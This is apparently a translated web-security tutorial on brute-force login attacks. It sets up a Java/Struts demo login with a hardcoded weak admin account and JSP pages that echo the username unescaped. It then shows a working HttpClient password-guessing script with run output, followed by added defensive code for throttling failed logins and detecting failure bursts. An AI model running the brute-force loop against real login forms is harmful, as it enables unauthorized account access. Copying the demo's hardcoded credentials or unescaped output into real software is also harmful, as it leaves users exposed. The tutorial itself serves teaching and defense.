The first thing to declare is that this article is purely the ignorant view of a small developer without much foresight or knowledge, and is intended only as a reference for Web system security.
1. Brief description
In a siege, the gate is always the easiest place to breach.
Because the login feature is open to everyone, countless attackers try to guess user names and passwords to gain unauthorized access to the system.
This kind of attack is almost ubiquitous: some attempts are systematic, some come from bored people trying their luck, and some are just users who typed a wrong user name and keep retrying.
2. Prerequisites and Preparation
We first need a system with a weak password so that we can try a brute-force attack against it.
Do not use this method against third-party applications; that is immoral and unfriendly behavior. This approach is shared mainly because the attack is so common: if system owners and developers do not pay attention to the problem, there is a good chance that the system will be broken into by others.
3. Login page of the demo system
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Test of a classmate of a meal</title>
</head>
<body>
<form action="aEasyLogin.action" method="POST" name="form1">
<table width="392" border="1">
<tr>
<td>
<br>
<div align="center">
<p>User name: <input type="text" name="username"></p>
<p>Password: <input type="password" name="password"></p>
</div>
</td>
</tr>
<tr align="center">
<td colspan="2" bgcolor="#FFCCFF"><input type="submit" value="Login" /></td>
</tr>
</table>
</form>
</body>
</html>
4. Java code simulating the login verification
package com.safe;

import javax.servlet.http.HttpServletRequest;
import org.apache.commons.lang.xwork.StringUtils;
import org.apache.struts2.ServletActionContext;
import com.opensymphony.xwork2.ActionSupport;

public class EasyLoginAction extends ActionSupport {
    private static final long serialVersionUID = 1931829246016041219L;

    public String execute() throws Exception {
        HttpServletRequest request = ServletActionContext.getRequest();
        String username = request.getParameter("username");
        String password = request.getParameter("password");
        request.setAttribute("username", username);
        // If either the user name or the password is empty, the login fails
        if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
            return "false";
        }
        // Simply assume one account for the demo: user name admin, password qwert
        if (username.equals("admin") && password.equals("qwert")) {
            return "success";
        } else {
            return "false";
        }
    }
}
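The action above compares the password with a plain equals and answers every guess at full speed, which is what makes the loop in section 7 cheap. The class below is an added hardening example, not the article's own code and without any Struts dependency: it keeps a failure counter per account and per client address, refuses attempts during a cool-down that doubles with each further failure, compares digests with MessageDigest.isEqual so that the comparison time does not depend on the input, and returns the same result for an unknown account and a wrong password. The in-memory SHA-256 credential map, the class name and the method names are assumptions for this demo.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.HashMap;
import java.util.Map;

/** Added example (not the article's code): a login check that throttles repeated failures. */
public class ThrottledLoginChecker {

    public enum Result { SUCCESS, FAILURE, LOCKED }

    /** Failure bookkeeping for one account or one client address. */
    private static final class Attempts {
        int failures;
        long lockedUntilMillis;
    }

    private static final byte[] DUMMY_HASH = new byte[32];

    // Hypothetical credential store: user name -> SHA-256 digest of the password.
    // A real system uses a slow salted hash (bcrypt, scrypt, Argon2) and a shared store.
    private final Map<String, byte[]> passwordHashes = new HashMap<>();
    private final Map<String, Attempts> byAccount = new HashMap<>();
    private final Map<String, Attempts> byAddress = new HashMap<>();
    private final int maxFailures;
    private final long baseLockMillis;

    public ThrottledLoginChecker(int maxFailures, long baseLockMillis) {
        this.maxFailures = maxFailures;
        this.baseLockMillis = baseLockMillis;
    }

    /** Registers an account; only the digest of the password is kept. */
    public void addUser(String username, String password) {
        passwordHashes.put(username, sha256(password));
    }

    public synchronized Result login(String username, String password,
                                     String clientAddr, long nowMillis) {
        Attempts acct = byAccount.computeIfAbsent(String.valueOf(username), k -> new Attempts());
        Attempts addr = byAddress.computeIfAbsent(clientAddr, k -> new Attempts());
        // During a cool-down the password is not even examined.
        if (nowMillis < acct.lockedUntilMillis || nowMillis < addr.lockedUntilMillis) {
            return Result.LOCKED;
        }
        if (matches(username, password)) {
            acct.failures = 0;
            addr.failures = 0;
            return Result.SUCCESS;
        }
        recordFailure(acct, nowMillis);
        recordFailure(addr, nowMillis);
        return Result.FAILURE; // identical for "no such user" and "wrong password"
    }

    /** From maxFailures on, each failure doubles the cool-down (capped at 2^10 x base). */
    private void recordFailure(Attempts a, long nowMillis) {
        a.failures++;
        if (a.failures >= maxFailures) {
            int shift = Math.min(a.failures - maxFailures, 10);
            a.lockedUntilMillis = nowMillis + (baseLockMillis << shift);
        }
    }

    private boolean matches(String username, String password) {
        byte[] stored = username == null ? null : passwordHashes.get(username);
        byte[] given = sha256(password == null ? "" : password);
        if (stored == null) {
            // Unknown account: still run a comparison so the response time gives nothing away.
            MessageDigest.isEqual(DUMMY_HASH, given);
            return false;
        }
        return MessageDigest.isEqual(stored, given); // constant-time comparison
    }

    private static byte[] sha256(String s) {
        try {
            return MessageDigest.getInstance("SHA-256").digest(s.getBytes(StandardCharsets.UTF_8));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Replays a short guessing loop against the article's demo account admin/qwert. */
    public static void main(String[] args) {
        ThrottledLoginChecker checker = new ThrottledLoginChecker(3, 30_000L);
        checker.addUser("admin", "qwert");
        long now = 0;
        for (String guess : new String[] {"123", "password", "letmein", "qwert"}) {
            System.out.println(guess + " -> " + checker.login("admin", guess, "127.0.0.1", now));
            now += 1_000;
        }
        System.out.println("after cool-down -> "
                + checker.login("admin", "qwert", "127.0.0.1", now + 60_000));
    }
}
```

With three allowed failures, the third wrong guess starts a 30-second cool-down, so the correct password submitted one second later is refused as LOCKED and only succeeds once the cool-down has passed. In an action like EasyLoginAction the checker would be one shared instance, and the client address comes from request.getRemoteAddr(), which the success page in section 5 already reads.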
5. JSP page for a successful login
<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageEncoding="UTF-8"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Watch your door, ah, classmate.</title>
</head>
<body>Successful landing, welcome <%= (String) request.getAttribute("username") %> from <%= request.getRemoteAddr() %></body>
</html>
6. JSP page for an unsuccessful login
<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageEncoding="UTF-8"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Watch your door, ah, classmate.</title>
</head>
<body><%= (String) request.getAttribute("username") %>, the login is unsuccessful, please check your password.</body>
</html>
7. Java brute-force login attack code
package com.safe;

import java.util.ArrayList;
import java.util.List;

import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

/**
 * Uses HttpClient to simulate a brute-force login attack; for web security examples only.
 *
 * @author Fan Fangming
 */
public class EasyAttackLogin {
    // Common password list, for example only
    static String[] passwords = {"123", "qwert"};
    // The user name has already been obtained; assume this information is known
    static String username = "admin";

    public static void main(String[] args) throws Exception {
        CloseableHttpClient httpclient = HttpClients.createDefault();
        try {
            // Impersonate a user login
            HttpPost httpPost = new HttpPost("http://127.0.0.1:8080/webStudy/aEasyLogin.action");
            EasyAttackLogin attack = new EasyAttackLogin();
            for (int i = 0; i < passwords.length; i++) {
                attack.getLogin(httpclient, httpPost, passwords[i]);
            }
        } finally {
            httpclient.close();
        }
    }

    public boolean getLogin(CloseableHttpClient httpclient, HttpPost httpPost, String pass) throws Exception {
        boolean flag = false;
        List<NameValuePair> nvps = new ArrayList<NameValuePair>();
        nvps.add(new BasicNameValuePair("username", username)); // form field for the user name
        nvps.add(new BasicNameValuePair("password", pass));     // form field for the password
        httpPost.setEntity(new UrlEncodedFormEntity(nvps));
        CloseableHttpResponse response = httpclient.execute(httpPost);
        try {
            System.out.println(response.getStatusLine());
            HttpEntity entity = response.getEntity();
            String content = EntityUtils.toString(entity);
            // The successful login page contains this keyword; it has to be found by observing the page
            if (content.indexOf("Successful landing") >= 0) {
                System.out.println("Password brute force hack successful, user admin password is: " + pass);
                flag = true;
            }
            EntityUtils.consume(entity);
        } finally {
            response.close();
        }
        return flag;
    }
}
Run results:
http/1.1 OK
http/1.1 OK
Password brute force hack successful, user admin password is: qwert
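Both attempts in the run results above come back as "OK", because the action renders a page for a failed login just as it does for a successful one, so a web-server access log alone cannot tell a guessing loop from normal traffic. The defender's counterpart to the loop in section 7 is therefore for the login action to record each outcome and for something to watch those records. Below is an added detection example, not the article's own code, that assumes a hypothetical one-line-per-attempt record format and counts failures in a sliding window per client address and per account; it raises one alert when a burst first reaches the threshold and another when a success follows such a burst, which is what a guessed password looks like in the log. The sample records are constructed for the demo.

```java
import java.time.Instant;
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Deque;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example (not the article's code): sliding-window failure counter over login outcome records. */
public class LoginFailureDetector {

    // Hypothetical record format written by the login action, one line per attempt:
    // <ISO-8601 timestamp> LOGIN_SUCCESS|LOGIN_FAIL user=<name> ip=<client address>
    private static final Pattern LINE = Pattern.compile(
            "^(\\S+) LOGIN_(SUCCESS|FAIL) user=(\\S+) ip=(\\S+)$");

    private final int threshold;
    private final long windowMillis;
    private final Map<String, Deque<Long>> failuresByIp = new HashMap<>();
    private final Map<String, Deque<Long>> failuresByUser = new HashMap<>();

    public LoginFailureDetector(int threshold, long windowMillis) {
        this.threshold = threshold;
        this.windowMillis = windowMillis;
    }

    /** Feeds one record and returns the alerts it triggers (usually none). */
    public List<String> feed(String line) {
        List<String> alerts = new ArrayList<>();
        Matcher m = LINE.matcher(line);
        if (!m.matches()) {
            return alerts; // unrelated line
        }
        long ts = Instant.parse(m.group(1)).toEpochMilli();
        boolean failed = "FAIL".equals(m.group(2));
        String user = m.group(3);
        String ip = m.group(4);

        int ipFails = recent(failuresByIp, ip, ts, failed);
        int userFails = recent(failuresByUser, user, ts, failed);

        if (failed) {
            // Alert once per burst, when the window count first reaches the threshold.
            if (ipFails == threshold) {
                alerts.add("burst from ip=" + ip + ": " + ipFails + " failures within window");
            }
            if (userFails == threshold) {
                alerts.add("burst against user=" + user + ": " + userFails + " failures within window");
            }
        } else if (ipFails >= threshold || userFails >= threshold) {
            // A success right after a burst of failures is the signature of a guessed password.
            alerts.add("possible guessed password: user=" + user + " from ip=" + ip
                    + " after " + Math.max(ipFails, userFails) + " recent failures");
        }
        return alerts;
    }

    /** Evicts timestamps older than the window, records this failure, returns the window count. */
    private int recent(Map<String, Deque<Long>> table, String key, long ts, boolean failed) {
        Deque<Long> q = table.computeIfAbsent(key, k -> new ArrayDeque<>());
        while (!q.isEmpty() && ts - q.peekFirst() > windowMillis) {
            q.pollFirst();
        }
        if (failed) {
            q.addLast(ts);
        }
        return q.size();
    }

    // Constructed sample records for this demo (not real traffic).
    static final String[] SAMPLE = {
        "2024-05-01T10:00:00Z LOGIN_FAIL user=admin ip=10.0.0.5",
        "2024-05-01T10:00:01Z LOGIN_FAIL user=admin ip=10.0.0.5",
        "2024-05-01T10:00:02Z LOGIN_FAIL user=bob ip=192.168.1.20",
        "2024-05-01T10:00:02Z LOGIN_FAIL user=admin ip=10.0.0.5",
        "2024-05-01T10:00:03Z LOGIN_FAIL user=admin ip=10.0.0.5",
        "2024-05-01T10:00:04Z LOGIN_SUCCESS user=admin ip=10.0.0.5",
        "2024-05-01T10:05:00Z LOGIN_SUCCESS user=bob ip=192.168.1.20",
    };

    public static void main(String[] args) {
        LoginFailureDetector detector = new LoginFailureDetector(3, 60_000L);
        for (String line : SAMPLE) {
            for (String alert : detector.feed(line)) {
                System.out.println("ALERT " + alert);
            }
        }
    }
}
```

With a threshold of three failures in sixty seconds, the admin records trigger a burst alert on the third failure (once for the address, once for the account) and a guessed-password alert on the success that follows, while bob's single mistake five minutes before his successful login stays quiet because it has left the window. Counting per address and per account separately matters because a single attacker may spread guesses across many accounts, and many attackers may share one account as a target.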
8. Ubiquitous security risks
1. In all likelihood, password guessing against the login is the most common attack behavior;
2. Modern PC hardware and network conditions make brute-force login attacks a very ordinary thing;
3. Do not try to attack others; this is very unfriendly.
Watch your door. The authentication mechanism under attack (2): Java brute-force login attack